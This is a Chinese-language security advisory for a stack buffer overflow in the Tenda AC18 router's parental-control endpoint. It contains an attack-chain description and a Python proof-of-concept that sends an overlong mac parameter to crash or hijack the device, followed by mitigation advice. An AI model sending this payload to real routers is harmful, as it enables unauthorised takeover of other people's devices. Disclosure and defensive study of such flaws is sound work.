CVE-2025-14992 Tenda AC18路由器栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-14992

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18

漏洞概述

CVE-2025-14992是发生在Tenda AC18路由器15.03.05.05版本中的一个严重安全漏洞。该漏洞存在于HTTP请求处理组件的/goform/GetParentControlInfo接口中，由于不当使用strcpy函数对mac参数进行复制操作，导致栈缓冲区溢出。攻击者可通过构造超长的mac参数值覆盖栈上的返回地址和相邻内存数据，实现远程代码执行。由于该漏洞可通过网络远程利用，且只需要低权限认证即可触发，因此危害性极高。此漏洞已被公开披露，相关的利用代码已在互联网传播，攻击者可能正在积极利用此漏洞攻击未修复的Tenda AC18路由器设备。建议受影响的用户立即采取防护措施。

技术细节

该漏洞的根本原因是在Tenda AC18路由器的Web服务器组件中，/goform/GetParentControlInfo处理函数使用了不安全的strcpy函数将用户输入的mac参数复制到固定大小的栈缓冲区中。strcpy函数在复制字符串时不会进行边界检查，当攻击者提交超长的mac参数时，会超出缓冲区的边界，覆盖栈上的返回地址、保存的寄存器值以及其他关键数据。攻击者可以通过精心构造mac参数的值，覆盖函数返回地址，使其指向恶意代码，从而在路由器上执行任意命令。由于HTTP请求处理通常以高权限（root）运行，成功利用此漏洞可获得完整的系统控制权。攻击者还可能通过覆盖栈上的其他数据结构来绕过安全检查或实现更复杂的攻击场景。

攻击链分析

STEP 1

步骤1

攻击者识别目标Tenda AC18路由器，并确认其运行受影响的固件版本15.03.05.05

STEP 2

步骤2

攻击者访问路由器的Web管理界面，使用低权限账号（如普通用户）登录

STEP 3

步骤3

攻击者构造恶意HTTP请求，访问/goform/GetParentControlInfo接口，并在mac参数中注入超长字符串

STEP 4

步骤4

恶意字符串通过strcpy函数复制到栈缓冲区，溢出覆盖返回地址和栈帧数据

STEP 5

步骤5

函数返回时跳转到攻击者控制的地址，执行恶意代码，获得root权限的远程shell

STEP 6

步骤6

攻击者完全控制路由器，可进行数据窃取、流量劫持、植入后门或作为僵尸网络节点

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14992 PoC - Tenda AC18 Stack Buffer Overflow
# Affected: Tenda AC18 firmware 15.03.05.05
# Component: /goform/GetParentControlInfo
# Vulnerability: strcpy buffer overflow via mac parameter

import requests
import sys

target_ip = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
target_port = 80

# Construct malicious mac parameter to trigger buffer overflow
# Fill the buffer and overwrite return address
padding = b"A" * 1000  # Buffer overflow payload
return_addr = b"\x42\x42\x42\x42"  # Target address (needs adjustment)

payload = padding + return_addr

url = f"http://{target_ip}:{target_port}/goform/GetParentControlInfo"
params = {"mac": payload.decode("latin-1")}

print(f"[*] Sending exploit to {url}")
print(f"[*] Payload length: {len(payload)}")

try:
    response = requests.get(url, params=params, timeout=10)
    print(f"[+] Response status: {response.status_code}")
    print(f"[+] Response length: {len(response.content)}")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")
    print("[*] Note: Exploit may have caused device crash or reboot")

影响范围

Tenda AC18 15.03.05.05

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 立即禁用路由器的远程管理功能，将Web管理界面限制为仅本地局域网访问；2) 修改默认的管理员密码，使用强密码；3) 启用路由器的防火墙功能，阻止来自互联网的HTTP/HTTPS访问；4) 监控设备日志，关注异常的认证尝试和请求；5) 如果路由器支持WAF或IPS功能，请确保已启用；6) 考虑使用VPN替代远程Web管理方式进行设备维护。